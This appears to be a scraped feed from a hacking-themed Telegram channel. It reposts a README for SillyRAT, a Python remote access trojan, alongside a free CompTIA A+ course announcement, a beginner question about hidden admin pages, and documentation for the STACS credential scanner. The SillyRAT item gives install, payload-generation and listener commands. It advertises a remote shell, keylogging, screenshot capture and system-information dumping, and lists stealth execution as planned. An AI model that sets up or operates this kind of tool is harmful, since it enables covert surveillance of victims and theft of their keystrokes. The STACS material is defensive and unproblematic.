Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
66K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
SillyRAT - A Cross Platform Multifunctional (Windows/Linux/Mac) RAT

A Cross Platform multifunctional (Windows/Linux/Mac) RAT.Getting StartedDescriptionA cross platform RAT written in pure Python. The RAT accept commands alongside arguments to either perform as the server who accepts connections or to perform as the client/target who establish connections to the server. The generate command uses the module pyinstaller to compile the actual payload code. So, in order to generate payload file for your respective platform, you need to be on that platform while generating the file. Moreover, you can directly get the source file as well.FeaturesBuilt-in Shell for command executionDumping System Information including drives and ramsScreenshot module. Captures screenshot of client screen.Connection Loop (Will continue on connecting to server)Currently, it uses BASE64 encoding. Pure PythonCross Platform. (Tested on Linux. Errors are accepted)Source File included for testingPython 3To be expected in futureStealth ExecutionEncryptionStoring Sessions from last attemptPushing Notifications when a client connectsInstallationThe tool is tested on Parrot OS with Python 3.8. Follow the steps for installation:$ git clone https://github.com/hash3liZer/SillyRAT.git$ cd SillyRAT/$ pip3 install -r requirements.txtDocumentationGenerating PayloadYou can get the payload file in two ways:Source FileCompiled FileThe source file is to remain same on all platforms. So, you can generate it on one platform and use it on the other. Getting the source file: $ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/payload.py --sourceThe compiled version has to generated on the respective platform. For example, you can't generate an .exe file on Linux. You specifically have to be on Windows. The tool is still under testing. So, all kinds of errors are accepted. Make sure to open an issue though. Generating the Compiled Version for Linux:$ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/filer Replace your IP Address and Port on above commands.Running ServerThe server must be executed on Linux. You can buy a VPS or Cloud Server for connections. For the record, the server doesn't store any session from last run. So, all the progress will lost once the server application gets terminated. Running your server:$ python3 sillyrat.py bind --address 0.0.0.0 --port 2999ConnectionsAll the connections will be listed under sessions command:$ sessionsYou can connect to you target session with connect command and launch one of available commands:keylogger on $ keylogger dump $ screenshot ">$ connect ID$ keylogger on$ keylogger dump$ screenshotHelpGet a list of available commands:$ helpHelp on a Specific Command:$ help COMMANDSupportTwitter: @hash3liZerDiscord: TheFlash2k#0407Download SillyRAT
Read more...

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Free Training on CompTIA A+ Full Course

Hi everyone,

I'm currently delivering free training on the full CompTIA A+ course. The course consists of 18 modules and I created a dedicated video for each module. Some of these videos might be a bit long since each video covers a whole module after all.

I added time stamps in each video for you convenience if your only looking for something specific in a module or only want to refresh on a certain topic so please feel free to make use of them.

There will be 20 videos for this course, the first is just the 4min intro explaining the course, the last will be a dedicated exam tips video and then obviously the 18 videos in between will be your modules with the actual course.

The training should be enough to pass both the international exams for A+ and the other courses I deliver should also be enough to pass the exams associated if there is a exam associated to that specific course.

If you have a question about a specific topic in a module or the course in general that you would like more clarity on, please feel free to ask and I will try to assist you where I can if I'm online.

Here is the course intro

CompTIA A+ Course Intro

submitted by /u/BurningIceTech
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
How do websites block /administrator pages

A website has www.website/administrator but it redirects you to the main index.php page. How do the the actual admins get acces to it if i can't? If not, how do they block me from accessing that certain page.





Sorry if this is a really, really stupid question, i just can't find anything on google

submitted by /u/Puzzleheaded-Pea-683
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Static Token And Credential Scanner

What is it?
STACS is a YARA (https://virustotal.github.io/yara/) powered static credential scanner which suports binary file formats, analysis (https://www.kitploit.com/search/label/Analysis) of nested archives, composable rulesets and ignore lists, and SARIF reporting.
What does STACS support?
Currently, STACS supports recursive unpacking of tarballs, gzips, bzips, zips, and xz files. As STACS works on detected file types, rather than the filename, propriatary file formats based on these types are automatically supported (such as Docker images, Android APKs, and Java JAR fles).
Who should use STACS?
STACS is designed for use by any teams who release binary artifacts. STACS provides developers the ability to automatically check for accidental inclusion of static credentials and key material in their releases.However, this doesn't mean STACS can't help with SaaS applications, enterprise software, or even source code!As an example, STACS can be used to find static credentials (https://www.kitploit.com/search/label/Credentials) in Docker images uploaded to public and private container (https://www.kitploit.com/search/label/Container) registries. It can also be used to find credentials accidentally compiled in to executables, packages for mobile devices, and "enterprise archives" - such as those used by Java application servers.
How does it work?
STACS detects static credentials using "rule packs" provided to STACS when run. These rule packs define a set of YARA rules to run against files provided to STACS. When a match against a rule is found, a "finding" is generated. These findings represent potential credentials inside of a file, and are reported on for a developer to remediate or "ignore".If the finding is found to be a false positive - that is, a match on something other than a real credential - the developer can generate a set of "ignore lists" to ensure that these matches don't appear in future reports.The real power from STACS comes from the automatic detection and unpacking of nested archives, and composable ignore lists and rule packs.
Ignore lists?
In order to allow flexible and collaborative usage, STACS supports composable ignore lists. This allows for an ignore list to include other ignore lists which enable composition of a "tree of ignores" based on organisational guidelines. These ignore lists are especially useful in organisations where many of the same frameworks or products are used. If a team has already marked a finding as a false positive, other teams get the benefit of not having to triage the same finding.
Rule packs?
In the same manner as ignore lists, rule packs are also composable. This enables an organisation to define a baseline set of rules for use by all teams, while still allowing teams to maintain rulesets specific to their products.
How do I use it?
The easiest way to use STACS is using the Docker images published to Docker Hub. However, STACS can also be installed directly from Python's PyPI, or by cloning (https://www.kitploit.com/search/label/Cloning) this repository. See the relevant sections below to get started!A cloud based service is coming soon which allows integration directly in build and release pipelines to enable detection of static credentials before release!
Docker
Using the published images, STACS can be used to scan artifacts right away! The STACS Docker images provides a number of volume mounts for files wanted to be scanned to be mounted directly into the scan container.As an example, to scan everything in the current folder, the following command can be run (Docker must be installed).docker run \
--rm \
--mount type=bind,source=$(pwd),target=/mnt/stacs/input \
stacscan/stacs:latest

___________________________
@hacking_Attack
@Hacking_Video
By default, STACS will output any findings in SARIF format directly to STDOUT and in order to keep things orderly, all log messages will be sent to STDERR. For more advanced use cases, a number of other volume mounts are provided. These allow the user to control the rule packs, ignore lists, and a cache directories to use.
PyPi
STACS can also be installed directly from Python's PyPi. This provides a stacs command which can then be used by developers to scan projects directly in their local development environments.STACS can be installed directly from PyPi using:pip install stacs
Please Note: The PyPi release of STACS does not come with any rules. These will also need to be cloned from the community rules repository (https://github.com/stacscan/stacs-rules)for STACS to work!
FAQ

Is there a hosted version of STACS?
Not yet. However, there are plans for a hosted version of STACS which can be easily integrated into existing build systems, and which contains additional prebuilt rule packs and ignore lists.
What do I do about false positives?
Unfortunately, false positives are an inevitable side effect during the detection of static credentials. If rules are too granular then rule maintenance becomes a burden and STACS may miss credentials. If rules are too coarse then STACS may generate too many false positives!In order to assist, STACS provides a number of tools to assist with reducing the number of false positives which make it into final reports.Primarily, STACS provides a mechanism which allows users to define composable ignore lists which allow a set of findings to be "ignored". These rules can be as coarse as ignoring all files based on a pattern, or as granular as a specific finding on a particular line of a file.This information is automatically propagated through into reports, so "ignored" findings will be marked as "suppressed" in SARIF output while also including the reason for the ignore in the output for tracking.
How do I view the results?
Currently, the only output format is SARIF v2.1.0. There are a number of viewers available which make this data easier to read, such as this great web based viewer from (https://microsoft.github.io/sarif-web-component/) Microsoft. An example of the findings from a Docker container image has been included below:

___________________________
@hacking_Attack
@Hacking_Video